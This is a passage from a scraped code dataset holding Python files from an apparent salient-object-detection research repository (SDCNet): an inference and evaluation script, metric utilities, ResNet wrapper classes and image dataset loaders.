pop = 2
if "Medium" in row[1]:
pop = 3
if "High" in row[1]:
pop = 4
if "Very High" in row[1]:
pop = 5
if pop == -1:
print("err", row[1])
exp = row[2].replace(",", "")
scrape_dict[name] = [pop, int(exp)]
model = load_model('acc_97_44.h5')
|
Python
| 386
| 35.992229
| 107
|
/python/test_python3_cli.py~
| 0.655182
| 0.439846
|
Sssssbo/SDCNet
|
refs/heads/master
|
import numpy as np
import os
import torch
import torch.nn.functional as F
from PIL import Image
from torch.autograd import Variable
from torchvision import transforms
from torch.utils.data import DataLoader
import matplotlib.pyplot as plt
import pandas as pd
from tqdm import tqdm
from misc import check_mkdir, AvgMeter, cal_precision_recall_mae, cal_fmeasure, cal_sizec, cal_sc
from datasets import TestFolder_joint
import joint_transforms
from model import R3Net, SDCNet
torch.manual_seed(2021)
# set which gpu to use
torch.cuda.set_device(6)
# the following two args specify the location of the file of trained model (pth extension)
# you should have the pth file in the folder './$ckpt_path$/$exp_name$'
ckpt_path = './ckpt'
exp_name = 'SDCNet'
msra10k_path = './SOD_label/label_msra10k.csv'
ecssd_path = './SOD_label/label_ECSSD.csv'
dutomrom_path = './SOD_label/label_DUT-OMROM.csv'
dutste_path = './SOD_label/label_DUTS-TE.csv'
hkuis_path = './SOD_label/label_HKU-IS.csv'
pascals_path = './SOD_label/label_PASCAL-S.csv'
sed2_path = './SOD_label/label_SED2.csv'
socval_path = './SOD_label/label_SOC-Val.csv'
sod_path = './SOD_label/label_SOD.csv'
thur15k_path = './SOD_label/label_THUR-15K.csv'
args = {
'snapshot': '30000', # your snapshot filename (exclude extension name)
'save_results': True, # whether to save the resulting masks
'test_mode': 1
}
joint_transform = joint_transforms.Compose([
#joint_transforms.RandomCrop(300),
#joint_transforms.RandomHorizontallyFlip(),
#joint_transforms.RandomRotate(10)
])
img_transform = transforms.Compose([
transforms.Resize((300, 300)),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
])
target_transform = transforms.ToTensor()
to_pil = transforms.ToPILImage()
to_test ={'ECSSD': ecssd_path,'SOD': sod_path, 'DUTS-TE': dutste_path} #{'DUTS-TE': dutste_path,'ECSSD': ecssd_path,'SOD': sod_path, 'SED2': sed2_path, 'PASCAL-S': pascals_path, 'HKU-IS': hkuis_path, 'DUT-OMROM': dutomrom_path}
def main():
net = SDCNet(num_classes = 5).cuda()
print('load snapshot \'%s\' for testing, mode:\'%s\'' % (args['snapshot'], args['test_mode']))
print(exp_name)
net.load_state_dict(torch.load(os.path.join(ckpt_path, exp_name, args['snapshot'] + '.pth')))
net.eval()
results = {}
with torch.no_grad():
for name, root in to_test.items():
print('load snapshot \'%s\' for testing %s' %(args['snapshot'], name))
test_data = pd.read_csv(root)
test_set = TestFolder_joint(test_data, joint_transform, img_transform, target_transform)
test_loader = DataLoader(test_set, batch_size=1, num_workers=0, shuffle=False)
precision0_record, recall0_record, = [AvgMeter() for _ in range(256)], [AvgMeter() for _ in range(256)]
precision1_record, recall1_record, = [AvgMeter() for _ in range(256)], [AvgMeter() for _ in range(256)]
precision2_record, recall2_record, = [AvgMeter() for _ in range(256)], [AvgMeter() for _ in range(256)]
precision3_record, recall3_record, = [AvgMeter() for _ in range(256)], [AvgMeter() for _ in range(256)]
precision4_record, recall4_record, = [AvgMeter() for _ in range(256)], [AvgMeter() for _ in range(256)]
precision5_record, recall5_record, = [AvgMeter() for _ in range(256)], [AvgMeter() for _ in range(256)]
precision6_record, recall6_record, = [AvgMeter() for _ in range(256)], [AvgMeter() for _ in range(256)]
mae0_record = AvgMeter()
mae1_record = AvgMeter()
mae2_record = AvgMeter()
mae3_record = AvgMeter()
mae4_record = AvgMeter()
mae5_record = AvgMeter()
mae6_record = AvgMeter()
n0, n1, n2, n3, n4, n5 = 0, 0, 0, 0, 0, 0
if args['save_results']:
check_mkdir(os.path.join(ckpt_path, exp_name, '%s_%s' % (name, args['snapshot'])))
for i, (inputs, gt, labels, img_path) in enumerate(tqdm(test_loader)):
shape = gt.size()[2:]
img_var = Variable(inputs).cuda()
img = np.array(to_pil(img_var.data.squeeze(0).cpu()))
gt = np.array(to_pil(gt.data.squeeze(0).cpu()))
sizec = labels.numpy()
pred2021 = net(img_var, sizec)
pred2021 = F.interpolate(pred2021, size=shape, mode='bilinear', align_corners=True)
pred2021 = np.array(to_pil(pred2021.data.squeeze(0).cpu()))
if labels == 0:
precision1, recall1, mae1 = cal_precision_recall_mae(pred2021, gt)
for pidx, pdata in enumerate(zip(precision1, recall1)):
p, r = pdata
precision1_record[pidx].update(p)
#print('Presicion:', p, 'Recall:', r)
recall1_record[pidx].update(r)
mae1_record.update(mae1)
n1 += 1
elif labels == 1:
precision2, recall2, mae2 = cal_precision_recall_mae(pred2021, gt)
for pidx, pdata in enumerate(zip(precision2, recall2)):
p, r = pdata
precision2_record[pidx].update(p)
#print('Presicion:', p, 'Recall:', r)
recall2_record[pidx].update(r)
mae2_record.update(mae2)
n2 += 1
elif labels == 2:
precision3, recall3, mae3 = cal_precision_recall_mae(pred2021, gt)
for pidx, pdata in enumerate(zip(precision3, recall3)):
p, r = pdata
precision3_record[pidx].update(p)
#print('Presicion:', p, 'Recall:', r)
recall3_record[pidx].update(r)
mae3_record.update(mae3)
n3 += 1
elif labels == 3:
precision4, recall4, mae4 = cal_precision_recall_mae(pred2021, gt)
for pidx, pdata in enumerate(zip(precision4, recall4)):
p, r = pdata
precision4_record[pidx].update(p)
#print('Presicion:', p, 'Recall:', r)
recall4_record[pidx].update(r)
mae4_record.update(mae4)
n4 += 1
elif labels == 4:
precision5, recall5, mae5 = cal_precision_recall_mae(pred2021, gt)
for pidx, pdata in enumerate(zip(precision5, recall5)):
p, r = pdata
precision5_record[pidx].update(p)
#print('Presicion:', p, 'Recall:', r)
recall5_record[pidx].update(r)
mae5_record.update(mae5)
n5 += 1
precision6, recall6, mae6 = cal_precision_recall_mae(pred2021, gt)
for pidx, pdata in enumerate(zip(precision6, recall6)):
p, r = pdata
precision6_record[pidx].update(p)
recall6_record[pidx].update(r)
mae6_record.update(mae6)
img_name = os.path.split(str(img_path))[1]
img_name = os.path.splitext(img_name)[0]
n0 += 1
if args['save_results']:
Image.fromarray(pred2021).save(os.path.join(ckpt_path, exp_name, '%s_%s' % (
name, args['snapshot']), img_name + '_2021.png'))
fmeasure1 = cal_fmeasure([precord.avg for precord in precision1_record],
[rrecord.avg for rrecord in recall1_record])
fmeasure2 = cal_fmeasure([precord.avg for precord in precision2_record],
[rrecord.avg for rrecord in recall2_record])
fmeasure3 = cal_fmeasure([precord.avg for precord in precision3_record],
[rrecord.avg for rrecord in recall3_record])
fmeasure4 = cal_fmeasure([precord.avg for precord in precision4_record],
[rrecord.avg for rrecord in recall4_record])
fmeasure5 = cal_fmeasure([precord.avg for precord in precision5_record],
[rrecord.avg for rrecord in recall5_record])
fmeasure6 = cal_fmeasure([precord.avg for precord in precision6_record],
[rrecord.avg for rrecord in recall6_record])
results[name] = {'fmeasure1': fmeasure1, 'mae1': mae1_record.avg,'fmeasure2': fmeasure2,
'mae2': mae2_record.avg, 'fmeasure3': fmeasure3, 'mae3': mae3_record.avg,
'fmeasure4': fmeasure4, 'mae4': mae4_record.avg, 'fmeasure5': fmeasure5,
'mae5': mae5_record.avg, 'fmeasure6': fmeasure6, 'mae6': mae6_record.avg}
print('test results:')
print('[fmeasure1 %.3f], [mae1 %.4f], [class1 %.0f]\n'\
'[fmeasure2 %.3f], [mae2 %.4f], [class2 %.0f]\n'\
'[fmeasure3 %.3f], [mae3 %.4f], [class3 %.0f]\n'\
'[fmeasure4 %.3f], [mae4 %.4f], [class4 %.0f]\n'\
'[fmeasure5 %.3f], [mae5 %.4f], [class5 %.0f]\n'\
'[fmeasure6 %.3f], [mae6 %.4f], [all %.0f]\n'%\
(fmeasure1, mae1_record.avg, n1, fmeasure2, mae2_record.avg, n2, fmeasure3, mae3_record.avg, n3, fmeasure4, mae4_record.avg, n4, fmeasure5, mae5_record.avg, n5, fmeasure6, mae6_record.avg, n0))
def accuracy(y_pred, y_actual, topk=(1,)):
"""Computes the precision@k for the specified values of k"""
final_acc = 0
maxk = max(topk)
# for prob_threshold in np.arange(0, 1, 0.01):
PRED_COUNT = y_actual.size(0)
PRED_CORRECT_COUNT = 0
prob, pred = y_pred.topk(maxk, 1, True, True)
# prob = np.where(prob > prob_threshold, prob, 0)
for j in range(pred.size(0)):
if int(y_actual[j]) == int(pred[j]):
PRED_CORRECT_COUNT += 1
if PRED_COUNT == 0:
final_acc = 0
else:
final_acc = float(PRED_CORRECT_COUNT / PRED_COUNT)
return final_acc * 100, PRED_COUNT
if __name__ == '__main__':
main()
|
Python
| 226
| 45.637169
| 227
|
/infer_SDCNet.py
| 0.54592
| 0.509962
|
Sssssbo/SDCNet
|
refs/heads/master
|
from .resnext101 import ResNeXt101
|
Python
| 1
| 34
| 34
|
/resnext/__init__.py
| 0.857143
| 0.685714
|
Sssssbo/SDCNet
|
refs/heads/master
|
import numpy as np
import os
import pylab as pl
#import pydensecrf.densecrf as dcrf
class AvgMeter(object):
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def check_mkdir(dir_name):
if not os.path.exists(dir_name):
os.mkdir(dir_name)
def cal_precision_recall_mae(prediction, gt):
# input should be np array with data type uint8
assert prediction.dtype == np.uint8
assert gt.dtype == np.uint8
assert prediction.shape == gt.shape
eps = 1e-4
prediction = prediction / 255.
gt = gt / 255.
mae = np.mean(np.abs(prediction - gt))
hard_gt = np.zeros(prediction.shape)
hard_gt[gt > 0.5] = 1
t = np.sum(hard_gt) #t is sum of 1
precision, recall, TPR, FP = [], [], [], []
# calculating precision and recall at 255 different binarizing thresholds
for threshold in range(256):
threshold = threshold / 255.
hard_prediction = np.zeros(prediction.shape)
hard_prediction[prediction > threshold] = 1
#false_pred = np.zeros(prediction.shape)
#false_prediction[prediction < threshold] = 1
a = prediction.shape
tp = np.sum(hard_prediction * hard_gt)
p = np.sum(hard_prediction)
#for roc
#fp = np.sum(false_pred * hard_gt)
#tpr = (tp + eps)/(a + eps)
fp = p - tp
#TPR.append(tpr)
FP.append(fp)
precision.append((tp + eps) / (p + eps))
recall.append((tp + eps) / (t + eps))
return precision, recall, mae#, TPR, FP
def cal_fmeasure(precision, recall):
assert len(precision) == 256
assert len(recall) == 256
beta_square = 0.3
max_fmeasure = max([(1 + beta_square) * p * r / (beta_square * p + r) for p, r in zip(precision, recall)])
return max_fmeasure
def cal_sizec(prediction, gt):
# input should be np array with data type uint8
assert prediction.dtype == np.uint8
assert gt.dtype == np.uint8
assert prediction.shape == gt.shape
eps = 1e-4
#print(gt.shape)
prediction = prediction / 255.
gt = gt / 255.
hard_gt = np.zeros(prediction.shape)
hard_gt[gt > 0.5] = 1
t = np.sum(hard_gt) #t is sum of 1
precision, recall, TPR, FP = [], [], [], []
# calculating precision and recall at 255 different binarizing thresholds
best_threshold = 0
best_F = 0
for threshold in range(256):
threshold = threshold / 255.
gt_size = np.ones(prediction.shape)
a = np.sum(gt_size)
hard_prediction = np.zeros(prediction.shape)
hard_prediction[prediction > threshold] = 1
tp = np.sum(hard_prediction * hard_gt)
p = np.sum(hard_prediction)
#print(a, p)
precision = (tp + eps) / (p + eps)
recall = (tp + eps) / (t + eps)
beta_square = 0.3
fmeasure = (1 + beta_square) * precision * recall / (beta_square * precision + recall)
if fmeasure > best_F:
best_threshold = threshold*255
best_F = fmeasure
sm_size = p / a
if 0 <= sm_size < 0.1:
sizec = 0
elif 0.1 <= sm_size < 0.2:
sizec = 1
elif 0.2 <= sm_size < 0.3:
sizec = 2
elif 0.3 <= sm_size < 0.4:
sizec = 3
elif 0.4 <= sm_size <= 1.0:
sizec = 4
return sizec, best_threshold#, TPR, FP
def cal_sc(gt):
# input should be np array with data type uint8
assert gt.dtype == np.uint8
eps = 1e-4
gt = gt / 255.
#print(gt.shape)
img_size = np.ones(gt.shape)
a = np.sum(img_size)
hard_gt = np.zeros(gt.shape)
hard_gt[gt > 0.5] = 1
p = np.sum(hard_gt)
b = np.sum(gt)
sm_size = float(p) / float(a)
#print(p, a, sm_size, b)
#print(gt)
if 0 <= sm_size < 0.1:
sizec = 0
elif 0.1 <= sm_size < 0.2:
sizec = 1
elif 0.2 <= sm_size < 0.3:
sizec = 2
elif 0.3 <= sm_size < 0.4:
sizec = 3
elif 0.4 <= sm_size <= 1.0:
sizec = 4
return sizec
def pr_cruve(precision, recall):
assert len(precision) == 256
assert len(recall) == 256
r = [a[1] for a in zip(precision, recall)]
p = [a[0] for a in zip(precision, recall)]
pl.title('PR curve')
pl.xlabel('Recall')
pl.xlabel('Precision')
pl.plot(r, p)
pl.show()
# for define the size type of the salient object
def size_aware(gt):
assert gt.dtype == np.uint8
eps = 1e-4
gt = gt / 255.
hard_gt = np.zeros(gt.shape)
hard_gt[gt > 0.5] = 1
t = np.sum(hard_gt)
pic = np.size(hard_gt)
rate = t/pic
return rate
# # codes of this function are borrowed from https://github.com/Andrew-Qibin/dss_crf
# def crf_refine(img, annos):
# def _sigmoid(x):
# return 1 / (1 + np.exp(-x))
# assert img.dtype == np.uint8
# assert annos.dtype == np.uint8
# assert img.shape[:2] == annos.shape
# # img and annos should be np array with data type uint8
# EPSILON = 1e-8
# M = 2 # salient or not
# tau = 1.05
# # Setup the CRF model
# d = dcrf.DenseCRF2D(img.shape[1], img.shape[0], M)
# anno_norm = annos / 255.
# n_energy = -np.log((1.0 - anno_norm + EPSILON)) / (tau * _sigmoid(1 - anno_norm))
# p_energy = -np.log(anno_norm + EPSILON) / (tau * _sigmoid(anno_norm))
# U = np.zeros((M, img.shape[0] * img.shape[1]), dtype='float32')
# U[0, :] = n_energy.flatten()
# U[1, :] = p_energy.flatten()
# d.setUnaryEnergy(U)
# d.addPairwiseGaussian(sxy=3, compat=3)
# d.addPairwiseBilateral(sxy=60, srgb=5, rgbim=img, compat=5)
# # Do the inference
# infer = np.array(d.inference(1)).astype('float32')
# res = infer[1, :]
# res = res * 255
# res = res.reshape(img.shape[:2])
# return res.astype('uint8')
|
Python
| 227
| 25.356829
| 110
|
/misc.py
| 0.56343
| 0.531673
|
Sssssbo/SDCNet
|
refs/heads/master
|
from .make_model import ResNet50, ResNet50_BIN, ResNet50_LowIN
|
Python
| 1
| 62
| 62
|
/resnet/__init__.py
| 0.822581
| 0.725806
|
Sssssbo/SDCNet
|
refs/heads/master
|
from .resnet import ResNet, BasicBlock, Bottleneck
import torch
from torch import nn
from .config import resnet50_path
model_urls = {
'resnet18': 'https://download.pytorch.org/models/resnet18-5c106cde.pth',
'resnet34': 'https://download.pytorch.org/models/resnet34-333f7ec4.pth',
'resnet50': 'https://download.pytorch.org/models/resnet50-19c8e357.pth',
'resnet101': 'https://download.pytorch.org/models/resnet101-5d3b4d8f.pth',
'resnet152': 'https://download.pytorch.org/models/resnet152-b121ed2d.pth',
}
class ResNet50(nn.Module):
def __init__(self):
super(ResNet50, self).__init__()
net = ResNet(last_stride=2,
block=Bottleneck, frozen_stages=False,
layers=[3, 4, 6, 3])
net.load_param(resnet50_path)
self.layer0 = net.layer0
self.layer1 = net.layer1
self.layer2 = net.layer2
self.layer3 = net.layer3
self.layer4 = net.layer4
def forward(self, x):
layer0 = self.layer0(x)
layer1 = self.layer1(layer0)
layer2 = self.layer2(layer1)
layer3 = self.layer3(layer2)
layer4 = self.layer4(layer3)
return layer4
def load_param(self, trained_path):
param_dict = torch.load(trained_path)
for i in param_dict:
if 'classifier' in i or 'arcface' in i:
continue
self.state_dict()[i].copy_(param_dict[i])
print('Loading pretrained model from {}'.format(trained_path))
class ResNet50_BIN(nn.Module):
def __init__(self):
super(ResNet50_BIN, self).__init__()
net = ResNet(last_stride=2,
block=IN_Bottleneck, frozen_stages=False,
layers=[3, 4, 6, 3])
net.load_param(resnet50_path)
self.layer0 = net.layer0
self.layer1 = net.layer1
self.layer2 = net.layer2
self.layer3 = net.layer3
self.layer4 = net.layer4
def forward(self, x):
layer0 = self.layer0(x)
layer1 = self.layer1(layer0)
layer2 = self.layer2(layer1)
layer3 = self.layer3(layer2)
layer4 = self.layer4(layer3)
return layer4
def load_param(self, trained_path):
param_dict = torch.load(trained_path)
for i in param_dict:
if 'classifier' in i or 'arcface' in i:
continue
self.state_dict()[i].copy_(param_dict[i])
print('Loading pretrained model from {}'.format(trained_path))
class ResNet50_LowIN(nn.Module):
def __init__(self):
super(ResNet50_LowIN, self).__init__()
net = ResNet_LowIN(last_stride=2,
block=Bottleneck, frozen_stages=False,
layers=[3, 4, 6, 3])
net.load_param(resnet50_path)
self.layer0 = net.layer0
self.layer1 = net.layer1
self.layer2 = net.layer2
self.layer3 = net.layer3
self.layer4 = net.layer4
def forward(self, x):
layer0 = self.layer0(x)
layer1 = self.layer1(layer0)
layer2 = self.layer2(layer1)
layer3 = self.layer3(layer2)
layer4 = self.layer4(layer3)
return layer4
def load_param(self, trained_path):
param_dict = torch.load(trained_path)
for i in param_dict:
if 'classifier' in i or 'arcface' in i:
continue
self.state_dict()[i].copy_(param_dict[i])
print('Loading pretrained model from {}'.format(trained_path))
|
Python
| 104
| 32.740383
| 78
|
/resnet/make_model.py
| 0.586492
| 0.54175
|
Sssssbo/SDCNet
|
refs/heads/master
|
import os
import os.path
import torch.utils.data as data
from PIL import Image
class ImageFolder_joint(data.Dataset):
# image and gt should be in the same folder and have same filename except extended name (jpg and png respectively)
def __init__(self, label_list, joint_transform=None, transform=None, target_transform=None):
imgs = []
self.label_list = label_list
for index, row in label_list.iterrows():
imgs.append((row['img_path'], row['gt_path'], row['label']))
self.imgs = imgs
self.joint_transform = joint_transform
self.transform = transform
self.target_transform = target_transform
def __len__(self):
return len(self.label_list)
def __getitem__(self, index):
img_path, gt_path, label = self.imgs[index]
img = Image.open(img_path).convert('RGB')
target = Image.open(gt_path).convert('L')
if self.joint_transform is not None:
img, target = self.joint_transform(img, target)
if self.transform is not None:
img = self.transform(img)
if self.target_transform is not None:
target = self.target_transform(target)
return img, target, label
class ImageFolder_joint_for_edge(data.Dataset):
# image and gt should be in the same folder and have same filename except extended name (jpg and png respectively)
def __init__(self, label_list, joint_transform=None, transform=None, target_transform=None):
imgs = []
for index, row in label_list.iterrows():
imgs.append((row['img_path'], row['gt_path'], row['label']))
self.imgs = imgs
self.joint_transform = joint_transform
self.transform = transform
self.target_transform = target_transform
def __getitem__(self, index):
img_path, gt_path, label = self.imgs[index]
edge_path = "."+gt_path.split(".")[1]+"_edge."+gt_path.split(".")[2]
img = Image.open(img_path).convert('RGB')
target = Image.open(gt_path).convert('L')
target_edge = Image.open(edge_path).convert('L')
if self.joint_transform is not None:
if img.size != target.size or img.size != target_edge.size:
print("error path:", img_path, gt_path)
print("size:", img.size, target.size, target_edge.size)
img, target, target_edge = self.joint_transform(img, target, target_edge)
if self.transform is not None:
img = self.transform(img)
if self.target_transform is not None:
target = self.target_transform(target)
target_edge = self.target_transform(target_edge)
return img, target, target_edge, label
def __len__(self):
return len(self.imgs)
class TestFolder_joint(data.Dataset):
# image and gt should be in the same folder and have same filename except extended name (jpg and png respectively)
def __init__(self, label_list, joint_transform=None, transform=None, target_transform=None):
imgs = []
for index, row in label_list.iterrows():
imgs.append((row['img_path'], row['gt_path'], row['label']))
self.imgs = imgs
self.joint_transform = joint_transform
self.transform = transform
self.target_transform = target_transform
def __getitem__(self, index):
img_path, gt_path, label = self.imgs[index]
img = Image.open(img_path).convert('RGB')
target = Image.open(gt_path).convert('L')
if self.joint_transform is not None:
img, target = self.joint_transform(img, target)
if self.transform is not None:
img = self.transform(img)
if self.target_transform is not None:
target = self.target_transform(target)
return img, target, label, img_path
def __len__(self):
return len(self.imgs)
def make_dataset(root):
img_list = [os.path.splitext(f)[0] for f in os.listdir(root) if f.endswith('.jpg')]
return [(os.path.join(root, img_name + '.jpg'), os.path.join(root, img_name + '.png')) for img_name in img_list]
class ImageFolder(data.Dataset):
# image and gt should be in the same folder and have same filename except extended name (jpg and png respectively)
def __init__(self, root, joint_transform=None, transform=None, target_transform=None):
self.root = root
self.imgs = make_dataset(root)
self.joint_transform = joint_transform
self.transform = transform
self.target_transform = target_transform
def __getitem__(self, index):
img_path, gt_path = self.imgs[index]
img = Image.open(img_path).convert('RGB')
target = Image.open(gt_path).convert('L')
if self.joint_transform is not None:
img, target = self.joint_transform(img, target)
if self.transform is not None:
img = self.transform(img)
if self.target_transform is not None:
target = self.target_transform(target)
return img, target
def __len__(self):
return len(self.imgs)
|
Python
| 125
| 39.872002
| 118
|
/datasets.py
| 0.623214
| 0.622627
|
End of preview. Expand
in Data Studio
README.md exists but content is empty.
- Downloads last month
- 9